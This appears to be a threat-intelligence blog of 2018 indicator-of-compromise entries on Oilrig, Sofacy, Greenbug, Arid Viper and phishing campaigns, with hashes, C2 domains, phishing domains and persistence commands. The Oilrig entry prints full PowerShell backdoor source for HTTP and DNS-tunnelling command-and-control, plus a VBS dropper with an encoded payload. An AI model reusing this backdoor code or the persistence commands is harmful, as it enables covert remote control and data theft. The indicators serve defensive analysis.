7b7a438dcb715d9a91b0557e442e1b9466eac3890d9415c4b8ad6a5d6696d9ea

2018-05-13: PRB-Backdoor and its connection to Oilrig

Following our collaboration with Mo Bustami (https://sec0wn.blogspot.ie/2018/05/prb-backdoor-fully-loaded-powershell.html):

We’ve found more infrastructure.

Today outl00k.net got a new IP:
145.239.214.52

This IP is part of a small range:

145.239.214.48-145.239.214.55

We have been tracking another IP on the same range, 145.239.214.54, as related to Oilrig

More pivoting yielded more indicators:

IOCs

fdb4b4520034be269a65cfaee555c52e

whatzapps\.net

outl00k.net

akamai-global\.com

217.79.176.97

145.239.214.52

dns.akamai-global.com

145.239.214.54

2018-04-09: myetherwallet impersonations

176.119.0.227

46.161.42.42

80.79.114.84

62.77.158.230

66.45.231.178

5.45.69.74

puhka7777@gmail.com

novikovm227@gmail.com

vika.krimko@gmail.com

vitkokonon@gmail.com

marininaalla33@gmail.com

rozinandrey736@gmail.com

login-myethewallet.com

xn--therwallet-qmb5070g82a.com

myetherwallet-register.com

xn--myetherwae-bl2ea19d.com

www.xn--yethrallet-umb5270gg0a.com

myevethwallet.com

xn--thrwallet-fibc2070g82a.com

www.xn--therwallet-qmb5070g82a.com

xn--yeheallet-4g6d4iniqn.com

xn--yeherallet-to2eus0l.com

myetheorwallet.com

xn--etherdela-ss6d.com

myethlrwallet.com

www-myetherrwallet.com

xn--etherdeta-wd6d.com

www.xn--etherdela-ss6d.com

myetherkwallet.com

xn--etherwallt-zmb6960g82a.com

myetherwatllet.com

www-myethertwallet.com

myetherwarllet.com

myethverwallet.com

www.xn--yehewalle-4g6d4inii.com

xn--yehewalle-4g6d4inii.com

myetherwajllet.com

xn--ethrwallet-tmb2070g82a.com

myetheprwallet.com

myetherwanllet.com

myetherwvalllet.com

xn--yethrallet-umb5270gg0a.com

www-myetherwalletc.com

www.xn--yeherwalle-to2eusia.com

myentherwallet.info

main-myetherwallet.com

xn--etherdlta-lib.com

xn--yeherwalle-to2eusia.com

myetherlwallet.info

www.xn--etherdeta-wd6d.com

xn--myetherwlet-jfe7054g.com

myuetherwallets.com

ru-myetherwallett.com

www.xn--yeherllet-4g6dkqwlmk.com

www.xn--etherdlta-lib.com

xn--myetherwet-g2d2237fa.com

www.xn--yeherallet-to2eus0l.com

xn--myetherwlet-jfe6054g.com

www.xn--etherdelt-876d.com

www.xn--yeheallet-4g6d4iniqn.com

xn--etherdelt-876d.com

2018-03-26: “SilentLibrarian” indicators (Iranian threat actor Mabna Institute) 

Pivoting based on indicators from Phishlabs’ report:

https://info.phishlabs.com/blog/silent-librarian-more-to-the-story-of-the-iranian-mabna-institute-indictment 

The campaign have been monitored by Gary Warner until 2105 here:

http://garwarner.blogspot.co.il/2015/01/universities-targeted-with-library.html 

Numerous phishing alerts warning of this campaign are available in universities websites:

Phishing domains

libi.ga

libna.ml

libru.gq

libt.cf

ulibr.cf

ulibr.ga

cvre.tk

edu.libt.cf

mncr.tk

msim.cvre.tk

nsae.ml

cavc.tk

lib2.ml

reactivation.in

seae.tk

saea.ga

Phishing sub-domains

ezvpn.mskcc.saea.ga        

library.asu.saea.ga        

library.lehigh.saea.ga        

moodle.ucl.ac.saea.ga        

saea.ga        

unex.learn.saea.ga        

unomaha.on.saea.ga        

www.uvic.saea.ga

catalog.lib.usm.edu.seae.tk

elearning.uky.edu.seae.tk

www.aladin.wrlc.org.seae.tk

alexandria.rice.ulibr.ga

cmich.ulibr.ga

columbia.ulibr.ga

edu.edu.libt.cf

ezproxy-authcate.lib.monash.ulibr.ga

login.revproxy.brown.edu.edu.libt.cf

ezproxy-authcate.monash.lib.ulibr.ga

ezproxy-f.deakin.au.ulibr.ga

lib.dundee.ac.uk.ulibr.ga

cas.usherbrooke.ca.cavc.tk

catalog.lib.ksu.edu.cavc.tk

isa.epfl.ch.cavc.tk

login.vcu.edu.cavc.tk

www.med.unc.edu.cavc.tk

cas.iu.edu.cavc.tk

ltuvpn.latrobe.edu.au.reactivation.in

passport.pitt.edu.reactivation.in

edu.login.revproxy.brown.edu.libt.cf

shibboleth.nyu.edu.reactivation.in

login.revproxy.brown.edu.login.revproxy.brown.edu.libt.cf

weblogin.pennkey.upenn.edu.reactivation.in

webmail.reactivation.in

www.ezlibproxy1.ntu.edu.sg.reactivation.in

www.ezpa.library.ualberta.ca.reactivation.in

www.lib.just.edu.jo.reactivation.in

www.passport.pitt.edu.reactivation.in

http://shib.ncsu.ulibr.cf/idp/profile/SAML2/POST/SSO

www.shibboleth.nyu.edu.reactivation.in

www.weblogin.pennkey.upenn.edu.reactivation.in

ezlibproxy1.ntu.edu.sg.reactivation.in

login.revproxy.brown.edu.libt.cf

weblogin.umich.edu.lib2.ml

catalog.sju.edu.mncr.tk

ezpa.library.ualberta.ca.reactivation.in

lib.just.edu.jo.reactivation.in

login.ezproxy.lib.purdue.edu.reactivation.in

login.libproxy.temple.shibboleth2.uchicago.ulibr.cf

shib.ncsu.shibboleth2.uchicago.ulibr.cf

shibboleth2.uchicago.shibboleth2.uchicago.ulibr.cf

singlesignon.gwu.shibboleth2.uchicago.ulibr.cf

webauth.ox.ac.uk.shibboleth2.uchicago.ulibr.cf

edu.libt.cf

login.libproxy.temple.ulibr.cf

shib.ncsu.ulibr.cf

singlesignon.gwu.ulibr.cf

webauth.ox.ac.uk.ulibr.cf

library.cornell.ulibr.ga

login.ezproxy.gsu.ulibr.ga

shibboleth2.uchicago.ulibr.cf

login.library.nyu.ulibr.ga

mail.ulibr.ga

webcat.lib.unc.ulibr.ga

www.ulibr.ga

www.alexandria.rice.ulibr.ga

www.cmich.ulibr.ga

www.columbia.ulibr.ga

www.ezproxy-authcate.lib.monash.ulibr.ga

www.ezproxy-authcate.monash.lib.ulibr.ga

www.ezproxy-f.deakin.au.ulibr.ga

www.lib.dundee.ac.uk.ulibr.ga

www.library.cornell.ulibr.ga

www.login.ezproxy.gsu.ulibr.ga

www.login.library.nyu.ulibr.ga

auth.berkeley.edu.libna.ml

sso.lib.uts.edu.au.libna.ml

bb.uvm.edu.cvre.tk

cline.lib.nau.edu.cvre.tk

illiad.lib.binghamton.edu.cvre.tk

libcat.smu.edu.cvre.tk

login.brandeis.edu.cvre.tk

msim.cvre.tk

libcat.library.qut.nsae.ml

www.webcat.lib.unc.ulibr.ga

2018-02-20: Arid Viper

49171.exe

MD5          : ee49961547877a18480e22f4076f95f2

SHA1         : 79bacd047841382aa06dc397f4952cbf03d07c3c

SHA256       : 77de59e9cea26a2d645ab371ae6a88c427b5c7cf802dd039a5361b648ffb70e6

Drops

ClarenceWoodbury.exe

MD5 bea6c718c8cc43938a01fdc12948d4c1

SHA1 7bc7810b6b7cbd25687598efc86dc118cc7204d3

SHA256 2f8e668ab4879319aa4aea5c9652b6d36716695092cde2995ff721c0b20c5027

Files:

C:\Users\admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\WindowsDriverFoundation.lnk

C:\ProgramData\ServicesLandell\WindowsDriverFoundation.exe

C:\ProgramData\ServicesLandell\me.txt

C2

katesacker.club        

Digital certificate

 Issuer:COMODO RSA Domain Validation Secure Server CA

Basic Information

Subject

OU=Domain Control Validated, OU=PositiveSSL, CN=katesacker.club

Issuer

C=GB, ST=Greater Manchester, L=Salford, O=COMODO CA Limited, CN=COMODO RSA Domain Validation Secure Server CA

Serial

251566680285886263220717906950112509352

Validity

2018-01-30 00:00:00to 2019-01-30 23:59:59 (365 days, 23:59:59)

Names

katesacker.club, www.katesacker.club

Fingerprint

SHA-256

1351b5fdb291a609cb9db9a764800d804d69089f3d46ecdfb9af7812b069e83c

SHA-1

b03a00434d06747aa530407dd4541e38b920db76

MD5

7c09dbcf9e1338aed86e07fa6c4db326

Public Key

Key Type

2048-bit RSA, e = 65,537

Modulus

e6:​f9:​d4:​1b:​d4:​11:​1c:​ad:​0c:​8f:​0a:​fd:​ec:​3b:​19:​10:​e9:​2d:​8d:​c6:​47:​0f:​e6:​d8:​e5:​77:​fd:​08:​88:​38:​d2:​95:​aa:​2f:​af:​17:​72:​ce:​7f:​12:​44:​b7:​85:​ed:​08:​d4:​2a:​ff:​db:​d4:​5c:​7c:​92:​7f:​87:​f7:​39:​c7:​02:​01:​5f:​14:​56:​d4:​33:​c7:​96:​b6:​e4:​04:​01:​98:​8c:​04:​ab:​e5:​52:​64:​7a:​4a:​bf:​ae:​45:​65:​c2:​f6:​23:​d3:​d6:​d6:​14:​a3:​8f:​d6:​44:​c7:​74:​31:​4e:​c6:​da:​93:​8e:​ca:​23:​95:​82:​fc:​ec:​ce:​49:​fa:​4d:​87:​94:​e4:​8a:​98:​d8:​54:​e8:​49:​c3:​ce:​88:​ca:​9d:​41:​ba:​58:​38:​c3:​cc:​60:​e6:​08:​09:​2b:​39:​e8:​84:​37:​52:​08:​d1:​b1:​26:​7d:​58:​82:​31:​9c:​69:​7e:​b3:​2b:​63:​31:​83:​ca:​ad:​14:​1c:​cf:​83:​05:​4b:​3a:​23:​16:​5a:​de:​04:​18:​41:​af:​22:​78:​18:​6e:​ad:​88:​b8:​f9:​44:​a1:​05:​ae:​4a:​3e:​34:​19:​5e:​de:​25:​47:​d6:​07:​2e:​a4:​ea:​18:​c7:​d9:​39:​aa:​33:​e1:​4f:​dd:​c2:​59:​83:​6d:​8b:​7a:​73:​2c:​d4:​cd:​21:​a4:​11:​c3:​75:​56:​1d:​52:​be:​45:​5c:​d7:​fc:​09:​59:​c9:​60:​7c:​fb:​87:​fb:​ec:​d3:​8b:​6d:​14:​ce:​b1:​b2:​e1:​09:​9a:​dd:​e2:​fd:​3b]

SPKI SHA-256

6403e0bdfc9e144c034204969191bd10b372c620835d96c435240458f275e0b0

Undetected sample

Lebanese_Movie_Maarek_Hob.exe

MD5        816c24094219844cb671558b96e14965

SHA-1        416707b88f7a2f19308ef8c8447393b7bb63cbac

SHA-256        304e8614ce056fcdb15801833d2926f9504fd63a9214a6fff920b0a99bcb8854

Lebanese_Movie_Maarek_Hob.exe

%ALLUSERSPROFILE%\ServicesLandell\me.txt

ClarenceWoodbury.exe

Menu\Programs\Startup\WindowsDriverFoundation.lnk

%ALLUSERSPROFILE%\ServicesLandell\WindowsDriverFoundation.exe

2018-02-12: Malicious Invoice of Telcel  Mexican Telecommunication Company

MD5    c1e092c7c9473094b65142dc0e12609e

SHA-256    bddd2d5136b79d856ea3f024e151578dbe604e427cd504298ed582cfc515b4f8

First submission    2018-02-08 02:14:58 UTC ( 3 days, 10 hours ago )

Last submission    2018-02-08 02:14:58 UTC ( 3 days, 10 hours ago )

filename    Edo_cuenta_Telcel.docm

Malicious invoice of Telcel, a Mexican telecommunication company, ITW.

Execution of PowerShell commands stored in an HTA file downloads malicious EXE and PDF files via Google Drive URLs. Then a  pdf file of an invoice is automatically opened as decoy, EXE file installs "NetSupport Manager" for remote control.

When the doc get opened, it asks for the customer’s last 4 digits (presumably phone number or credit card), while running malicious VBScriptthat is using an hta file. The HTA file contains  PowerShell commands That upon execution, lead to , addressing a Google Drive URL downloading another ,malicious file.

VBScriptcontains Spanish regarding Telcel account:

HTA File:

HTA File Details:

MD5 8b2626b0d0d3ff2cf8a48d4e779a158f

SHA256 b211ae60a56f6c7d79fa8c0e4aaf694f7a314b80f85b6fdc0c529894e3608dee

First submission 2018-02-09 02:08:23 UTC ( 2 days, 12 hours ago )

Last submission 2018-02-09 02:08:23 UTC ( 2 days, 12 hours ago )

File names    tmp_drw.hta

Malicious URL: hxxps://drive.google[.]com/uc?export=download&id=1eWVOmwLVGFxJJORreVqu_0v6xSoGXShc

Downloaded EXE file:

MD5 b6194a60a0d1bb2519b77e5156d83da1

SHA256 cb30a8422f871c3ed6839af378a0f4900f5266475efd5c9373da730a1788a806

First submission 2018-02-08 04:39:39 UTC ( 3 days, 9 hours ago )

Last submission 2018-02-08 07:10:02 UTC ( 3 days, 7 hours ago )

File Type: WIN EXE

File names    codexgigas_8c9880b4d52124efeae9dbc9521a861c404ba041

binario01.bin";filename*=UTF-8''binario01.bin

internal name: C:/users/admin/appdata/roaming/microsoft/windows/start menu/programs/startup/Update.SmartWin.scr

After reboot the downloaded file installs and launches“NetSupport Manager” - public software for remote control.

MD5    5856590ed86c3803b7d76ca5d5c29d5b

SHA-256    ff1e9c7ad24dac447da663169c09db10d2165a52dc35d3bb763ea7bd72a9d710Communicates with bambi.sytes[.]net hosted on 187.144.145[.]76.

Furthermore, an additional PDF file is downloaded and got opened automatically in order to decoy the malicious behaviour. The second file was downloaded via the following Google Drive URL:

hxxps://drive.google[.]com/uc?export=download&id=1nD--gO1sHjaHghlRILZlLExKrGKlyrwR

Downloaded file:

MD5 360cdf05e7b4f46ef1a508b9983303af

SHA256 56eec198f34e93b29918bd767652f5b90d67f6c43784b180f345a58060fe5a79

First submission 2018-02-08 06:02:59 UTC ( 3 days, 8 hours ago )

Last submission 2018-02-08 06:03:00 UTC ( 3 days, 8 hours ago )

File names        Factura Dipsa sa de cv.pdf";filename*=UTF-8''Factura%20Dipsa%20sa%20de%20cv.pdf

Language es-MX

internal name: C:/windows/temp/306355626.pdf

2018-02-06: #Sofacy targeting the embassy of Romania in Moscow

certutil -decode C:\Programdata\W1H2Z1E2.txt C:\Programdata\L4K1S8M9.exe

C:\Programdata\W1H2Z1E2.txt

MD5         2361181C5D9A15EC3D5249DE1985B83D

SHA1         364CD7C0E94C41551F1D73EFCDD00D4ABDD832D3

SHA256         0CAB912409CCD2A5D90FB82B02376A633EC09F1DCF33480720E35E9714068C2A

C:\Programdata\L4K1S8M9.exe

MD5 36524c90ca1fac2102e7653dfadb31b2

SHA1 8d6db316ea4e348021cb59cf3c6ec65c390f0497

SHA256 ff808d0a12676bfac88fd26f955154f8884f2bb7c534b9936510fd6296c543e8

Detected by THOR APT Scanner
Matched Rule:
Sofacy_Malware_Sednit_Dec16_A
Ruleset:
Sofacy Monitoring
Description: Detects Sofacy Malware Sednit
Reference: Internal Research

C2:

cdnverify.net

2018-02-06: Iranian #Greenbug targeting against Arab Emirates - Invoice-NO48935.doc

Invoice-NO48935.doc

486bdf835a453c6ffb5f56647e697871

1f6369b42a76d02f32558912b57ede4f5ff0a90b18d3b96a4fe24120fa2c300c

        

IOCs

SchTasks /Create /SC MINUTE /MO 1 /TN "Conhost" /TR "wscript C:\Users\admin\AppData\Roaming\AdobeAcrobatLicenseVerify.vbs"

 

SchTasks /create /sc minute /mo 5 /tn AdobeAcrobatLicenseVerify /tr "wscript.exe "C:\Users\admin\AppData\Local\Temp\AdobeAcrobatLicenseVerify.vbs" \"powershell.exe -ExecutionPolicy bypass -WindowStyle hidden -NoProfile 'C:\Users\admin\AppData\Roaming\AdobeAcrobatLicenseVerify.ps1' \""

 

AdobeAcrobatLicenseVerify.vbs

MD5           BA2B36EC76F13B0B6CC3B263EF9D3026

SHA1           F1736B66D92F968A047FBA382FB8688D9163B2AF

SHA256 B7DFDBC89FABF327F9A6AAEB233030B04A7AF202CC72559BD9BEE39A98ADFD4C

AdobeAcrobatLicenseVerify.ps1

MD5           93B79FEA62A774DD781E3278CDDAE898

SHA1           D0FCC4C33C1003016ACECD90B981A882ECE129E3

SHA256 322C502CBE74FA99FA1F162CC6AC6CE1D9594945E68584DC326D39298589B328

 

MD5           BA2B36EC76F13B0B6CC3B263EF9D3026

SHA1           F1736B66D92F968A047FBA382FB8688D9163B2AF

SHA256 B7DFDBC89FABF327F9A6AAEB233030B04A7AF202CC72559BD9BEE39A98ADFD4C

%AppData%\Roaming\AdobeAcrobatLicenseVerify.vbs

%AppData%\Roaming\AdobeAcrobatLicenseVerify.ps1

2018-01-16: New Order PO

http://185.165.29.58/buchi/i/fred.php

2018-01-02: Iranian threat group Oilrig Bahrain decoy (tweet)

__محضر اجتماع بشأن مملكة.البحرين_2.chm البحرين_2.chm

(Minutes of a meeting on the Kingdom of Bahrain)

MD5        2bf8099845f805a1d9d09af1527d12be

SHA-1        5e03c07bac8bbd49ac4ac32e1034229db6c813e5

SHA-256        2d71ae51af7e7baf4bd2cb24a3cd9bf7ceed9afbf77a9ac2f6d591d277f749cc

C2:

Window5\.win

185.181.8.246

 C:\Users\admin\AppData\Local\java\hxyz.ps1

MD5         BED81E58EF8FF0B073E371D433A08855

SHA1         FE6AFCB6329F989AC76446B51058B2C3F37362B6

SHA256         FF2AEE8B401A770815EC4A9B76C089F45C5DF0C649C57E4B105DA46F8B4AB4EC

=================================================

$wc=new-object system.net.WebClient

$wc.UseDefaultCredentials = $true

$srvr="http://"+[System.Net.Dns]::GetHostAddresses("www.window5.win") +"/update.aspx"

$ip=(Get-NetIPConfiguration).IPv4Address|%{$_.IPv4Address}

$ut=whoami|%{@("lu","su")[$_ -eq 'nt authority/system']}

$b=wmic diskdrive get serialnumber|Select-Object -Skip 1|where{$_ -ne ""}|%{$_.trim().replace('-','')};$aid=$b -join ''|%{$ut+$_+"435697824038"}|%{$_.substring(0, 12)}

$rp = $env:PUBLIC  + "\Java\" + $aid

$upp = $env:PUBLIC  + "\Java\files\";

function sndr($fname, $cnt){

        $adr = adrCt "$fname" "2"

        $wc.UploadString($adr, [System.Convert]::ToBase64String([System.Text.Encoding]::Default.GetBytes($cnt)))

}

function adrCt($ridIn, $ac){

        $cr = @()

        $dar = @()

        $dar = -join (Get-Random -InputObject (0 .. 9) -Count 15)

        $cr = Get-Random -InputObject (0 .. 9) -Count 2

        $dar = $dar.Insert($cr[0], $ridIn.Trim()).Insert(($cr[1]), $aid)

        $adr = "$($srvr)?version=$($dar)5$($ac)7$($cr[0])$($cr[1])"

        return $adr

}

if (-not (Test-Path -Path $rp))

{

        New-Item -ItemType Directory -Path $rp;

        sndr '31313113131' "$($env:COMPUTERNAME)/$($env:USERNAME)<>$($ip)";

}

$adr = adrCt "13246490865" "0"

$rid = $wc.DownloadString($adr)

if ($rid){

        if ($rid.length -eq 11){

                $adr = adrCt "$rid" "1"

                $r = $wc.DownloadString($adr)

                $rcnt = [System.Text.Encoding]::Default.GetString([System.Convert]::FromBase64String($r))

                $adr = adrCt "$rid" "3"

                $wc.DownloadString($adr)

                if(-not(Test-Path $upp)) {md $upp;}

                if ($rid.EndsWith("0")){

                        $rcnt = $rcnt | ? { $_.trim() -ne "" }

                        $res += $rcnt.Split("&") | foreach-object { $_ | iex | Out-String }

                        sndr $rid $res

                }

                elseif ($rid.EndsWith("1")){

                        $adr = $rcnt.Trim()

                        if (Test-Path -Path $adr)

                        {

                                $adrS = adrCt "$rid" "4"

                                $wc.UploadFile($adrS, $adr)

                        }

                        else

                        {

                                sndr $rid "404"

                        }

                }

                elseif ($rid.EndsWith("2")){

                        $savAdr = $upp+$rcnt.trim();

                        $adrS = adrCt "$rid" "5"

                        $wc.DownloadFile($adrS, $savAdr)

                        sndr $rid "200<>$savAdr"

                }

        }

}

=================================================

 C:\Users\admin\AppData\Local\java\dxyz.ps1

MD5         63D6B1933F7330358A8FBFAF77532133

SHA1         E6F828A64B71DEC79A0263039B400709D75F6155

SHA256         398A1932AB2F639BC4D887002A54CC60A2885AF4ADEE1843A3CBE509815DD512

=================================================

$dom="window5.win";

$ut=whoami|%{@("LU","SU")[$_.StartsWith("nt")]}

$b=wmic diskdrive get serialnumber|Select-Object -Skip 1|where{$_ -ne ""}|%{$_.trim().replace('-','')};

$aid=$b -join ''|%{$ut+$_}|%{$_.substring(0, 12)};

$sm = $false;$ct = 0;$fb = @();$rn = "000";$run = $true;$ec=0;$ac="0";$re="";$sp=$env:TMP;$fn="";

function rslv($da){

        $dab = [system.Text.Encoding]::UTF8.GetBytes($da);

        $r = ""; $cnt = 0; $p1 = ""; $p2 = "";

        for ($i = 0; $i -lt $dab.Length; $i++){

                if ($cnt -eq 30) { $cnt = 0; $r += ($p1 + $p2); $p1 = ""; $p2 = "";}

                $tmp = [System.BitConverter]::ToString($dab[$i]);$p1 += $tmp[0]; $p2 += $tmp[1]; $cnt++;}

        $r += ($p1 + $p2);return $r;}

While ($run){

        Start-Sleep -m 50;

        if ($ec -gt 5) { break }

        if($ct -eq [int]$rn) {$ec++}

        if ($ct -lt 10) { $rn = "00$($ct)"; }

        elseif ($ct -lt 100) { $rn = "0$($ct)"; }

        else { $rn = "$($ct)"; }

        $rnd = -join (Get-Random -InputObject (10 .. 99) -Count (%{ Get-Random -InputObject (2 .. 9) }));

        try{$la = "$($rnd)$($ac)$($rn)$($aid)B007.$($dom)";$rt = [System.Net.Dns]::GetHostAddresses($la);}catch{$ec++;continue;}

        $rsu = $rt[0].IPAddressToString; $rs = $rsu.Split('.');

        if (($rs[0] -eq 1) -and ($rs[1] -eq 2) -and ($rs[2] -eq 3)){

                $sm = $false; $le = $fb.Length; if ($fb[$le - 1] -eq 0 -and $fb[$le - 2] -eq 0){$fbt = $fb[0 .. ($le - 3)];

                }elseif ($fb[$le - 1] -eq 0) { $fbt = $fb[0 .. ($le - 2)]; }else { $fbt = $fb; }

                [System.IO.File]::WriteAllBytes($sp, $fbt); $fb = @(); $ct = 0; break;}

        if ($sm){if ($ct -gt 250) { $ct = 0; }

                if ($ct -eq $rs[3]) { $fb += $rs[0]; $fb += $rs[1]; $fb += $rs[2]; $ct = $ct + 3; }}

        if ($rsu.startsWith("24.125")) { $fn = $rs[2] + "" + $rs[3]; $sp += "\" + $fn; $sm = $true; $ac = "1"; $ct = 0; }

        if ($rlt -eq "11.24.237.110") { $run = $false; $ec = $ec + 3; break; }}

if($ec -ge 5) { break }

if((Get-Item $sp).length -gt 0kb){

        if ($sp.EndsWith("0")){

                $fc=Get-Content $sp | ? { $_.trim() -ne "" };

                $re=($fc+" 2>&1")|cmd.exe|Out-String;}

        elseif ($sp.EndsWith("1")){Move-Item -path $sp -destination ($sp+".ps1") -Force; $re = "file saved: " + $sp; }

        elseif ($sp.EndsWith("3")) { $re = "whoami&ipconfig /all 2>&1" | cmd.exe | Out-String; }}

$sfn="*"*27;$fin = $sfn.Insert(0, $fn) | %{ $_.Insert(6, $re.Length) } | %{ $_[0 .. 26] -join "" }

$fin=rslv $fin;$res=rslv $re;$res="bWV0YT"+$fin+$res;$cs=60;

$rn = "000";$ac="2";$bk = 0;$run=$true;$ec=0;$ct=0;$cc="";

While($run){Start-Sleep -m 50;

        if ($ec -ge 5) { break }if ($ct -eq [int]$rn) { $ec++ }if ($ct -eq 250){$ct=0;$bk +=250;}

        if($ct -lt 10){$rn="00$($ct)";}elseif($ct -lt 100){$rn="0$($ct)";}else {$rn="$($ct)";}

        if ($res.Length -gt $cs){

                if (($res.Length - $cs * ($ct + $bk)) -ge $cs){$cc = $res.Substring($cs * ($ct + $bk), $cs);}

                elseif (($res.Length - $cs * ($ct + $bk)) -gt 0){$cc = $res.Substring($cs * ($ct + $bk), ($res.Length - $cs * ($ct + $bk)));}

                else{$cc = "bWV0YTZW5k";$run = $false;}}else{$cc=$res;}

        $ers = -join((48 .. 57)+(65 .. 70)|Get-Random -Count (%{ Get-Random -InputObject (1 .. 7) })|%{[char]$_ });

        $crp = Get-Random -InputObject (0 .. 9) -Count 2;

        $cdr = $aid.Insert(($crp[1]), $ac).Insert($crp[0], $rn);

        $fnt = rslv $fn;

        $la="$($cdr)$($ers)A$($crp[0])$($crp[1])7.$cc.$fnt.$($dom)";

        try{$rp=[System.Net.Dns]::GetHostAddresses($la);}catch{$ec=$ec+1;continue;}

        if ($rp -eq $null) {$ec=$ec+1;continue}

        $rlt=$rp[0].IPAddressToString;$rsp = $rlt.Split('.');

        if($rlt.startsWith("1.2.3")){$ct=[int]$rsp[3];}

        if($rlt -eq "11.24.237.110"){$bk=0;$run=$false;$ec=$ec+3;}}

=================================================

 C:\Users\admin\AppData\Local\java\rxyz.vbs

MD5         486627A011AA59C206396AD228AA74C7

SHA1         A682619757638613F0084895636F7D571F3D2839

SHA256         DFAFCCC62D3FB41871ECC40C44A8B738E7CFC612CE3FF1838F530E2D6E435ACF

=================================================

set Shell0 = CreateObject("wscript.shell")

Shell0.run "powershell.exe -exec bypass -file  C:\Users\admin\AppData\Local\java\hxyz.ps1 ", 0, false

command1 = "Powershell.exe -exec bypass -file C:\Users\admin\AppData\Local\java\dxyz.ps1"

set Shell1 = CreateObject("wscript.shell")

shell1.run command1, 0, false

=================================================

 C:\Users\admin\AppData\Local\java\cxyz.bat

MD5         06001101F089858B9089AB6D86BFC449

SHA1         8651A59191A5C476FEFC971C4CA5086932D84941

SHA256         C2790A8A713A98403EA038345FC3646A11D9055378C4167AD557D678D1954D55

=================================================

@schtasks /create /F /sc minute /mo 1 /tn "\Java\JavaUpdates" /tr "wscript /b "C:\Users\admin\AppData\Local\java\rxyz.vbs""

@schtasks /create /F /sc minute /RU "SYSTEM" /mo 1 /tn "\Java\JavaUpdates" /tr "wscript /b "C:\Users\admin\AppData\Local\java\rxyz.vbs""

=================================================

 C:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\YEP3SQ0Y\catalogs[1].SFL

MD5         06296FFF993AA9ED112A9F43A186E936

SHA1         ACDA2ADFCC557C08A3C3C0AF9A030AE1036318A0

SHA256         8460937B8C2F553804E45832AE4FD0D4A9F88AD4B3C741DDA005AD3DDDF9A8FB

=================================================

Dim oFSO

Dim oShell

Set oShell = WScript.CreateObject ("WScript.Shell")

Set oFSO = CreateObject("Scripting.FileSystemObject")

Dim objFso

Set objFso = WScript.CreateObject("Scripting.FileSystemObject")

Set objNetwork = CreateObject("WScript.Network")

userName = objNetwork.userName

If Not objFso.FolderExists("C:\Users\"&userName&"\AppData\Local\java") Then

  objFso.CreateFolder "C:\Users\"&userName&"\AppData\Local\java"

End If

if Not objFso.FileExists("C:\Users\"&userName&"\AppData\Local\java\rxyz.vbs") Then

        outFile = "C:\Users\"&userName&"\AppData\Local\java\rxyz.vbs"

        Set objFile = objFSO.CreateTextFile(outFile,True)

        objFile.Write "set Shell0 = CreateObject(""wscript.shell"")" & vbCrLf & "Shell0.run ""powershell.exe -exec bypass -file  C:\Users\"&userName&"\AppData\Local\java\hxyz.ps1 "", 0, false" & vbCrLf & "command1 = ""Powershell.exe -exec bypass -file C:\Users\"&userName&"\AppData\Local\java\dxyz.ps1""" & vbCrLf & "set Shell1 = CreateObject(""wscript.shell"")" & vbCrLf & "shell1.run command1, 0, false"

        objFile.Close

End If

if Not objFso.FileExists("C:\Users\"&userName&"\AppData\Local\java\hxyz.base") Then

        code2 = "JHdjPW5ldy1vYmplY3Qgc3lzdGVtLm5ldC5XZWJDbGllbnQNCiR3Yy5Vc2VEZWZhdWx0Q3JlZGVudGlhbHMgPSAkdHJ1ZQ0KJHNydnI9Imh0dHA6Ly8iK1tTeXN0ZW0uTmV0LkRuc106OkdldEhvc3RBZGRyZXNzZXMoInd3dy53aW5kb3c1LndpbiIpICsiL3VwZGF0ZS5hc3B4Ig0KJGlwPShHZXQtTmV0SVBDb25maWd1cmF0aW9uKS5JUHY0QWRkcmVzc3wleyRfLklQdjRBZGRyZXNzfQ0KJHV0PXdob2FtaXwle0AoImx1Iiwic3UiKVskXyAtZXEgJ250IGF1dGhvcml0eS9zeXN0ZW0nXX0NCiRiPXdtaWMgZGlza2RyaXZlIGdldCBzZXJpYWxudW1iZXJ8U2VsZWN0LU9iamVjdCAtU2tpcCAxfHdoZXJleyRfIC1uZSAiIn18JXskXy50cmltKCkucmVwbGFjZSgnLScsJycpfTskYWlkPSRiIC1qb2luICcnfCV7JHV0KyRfKyI0MzU2OTc4MjQwMzgifXwleyRfLnN1YnN0cmluZygwLCAxMil9DQokcnAgPSAkZW52OlBVQkxJQyAgKyAiXEphdmFcIiArICRhaWQNCiR1cHAgPSAkZW52OlBVQkxJQyAgKyAiXEphdmFcZmlsZXNcIjsNCmZ1bmN0aW9uIHNuZHIoJGZuYW1lLCAkY250KXsNCgkkYWRyID0gYWRyQ3QgIiRmbmFtZSIgIjIiDQoJJHdjLlVwbG9hZFN0cmluZygkYWRyLCBbU3lzdGVtLkNvbnZlcnRdOjpUb0Jhc2U2NFN0cmluZyhbU3lzdGVtLlRleHQuRW5jb2RpbmddOjpEZWZhdWx0LkdldEJ5dGVzKCRjbnQpKSkNCn0NCmZ1bmN0aW9uIGFkckN0KCRyaWRJbiwgJGFjKXsNCgkkY3IgPSBAKCkNCgkkZGFyID0gQCgpDQoJJGRhciA9IC1qb2luIChHZXQtUmFuZG9tIC1JbnB1dE9iamVjdCAoMCAuLiA5KSAtQ291bnQgMTUpDQoJJGNyID0gR2V0LVJhbmRvbSAtSW5wdXRPYmplY3QgKDAgLi4gOSkgLUNvdW50IDINCgkkZGFyID0gJGRhci5JbnNlcnQoJGNyWzBdLCAkcmlkSW4uVHJpbSgpKS5JbnNlcnQoKCRjclsxXSksICRhaWQpDQoJJGFkciA9ICIkKCRzcnZyKT92ZXJzaW9uPSQoJGRhcik1JCgkYWMpNyQoJGNyWzBdKSQoJGNyWzFdKSINCglyZXR1cm4gJGFkcg0KfQ0KaWYgKC1ub3QgKFRlc3QtUGF0aCAtUGF0aCAkcnApKQ0Kew0KCU5ldy1JdGVtIC1JdGVtVHlwZSBEaXJlY3RvcnkgLVBhdGggJHJwOw0KCXNuZHIgJzMxMzEzMTEzMTMxJyAiJCgkZW52OkNPTVBVVEVSTkFNRSkvJCgkZW52OlVTRVJOQU1FKTw+JCgkaXApIjsNCn0NCiRhZHIgPSBhZHJDdCAiMTMyNDY0OTA4NjUiICIwIg0KJHJpZCA9ICR3Yy5Eb3dubG9hZFN0cmluZygkYWRyKQ0KaWYgKCRyaWQpew0KCWlmICgkcmlkLmxlbmd0aCAtZXEgMTEpew0KCQkkYWRyID0gYWRyQ3QgIiRyaWQiICIxIg0KCQkkciA9ICR3Yy5Eb3dubG9hZFN0cmluZygkYWRyKQ0KCQkkcmNudCA9IFtTeXN0ZW0uVGV4dC5FbmNvZGluZ106OkRlZmF1bHQu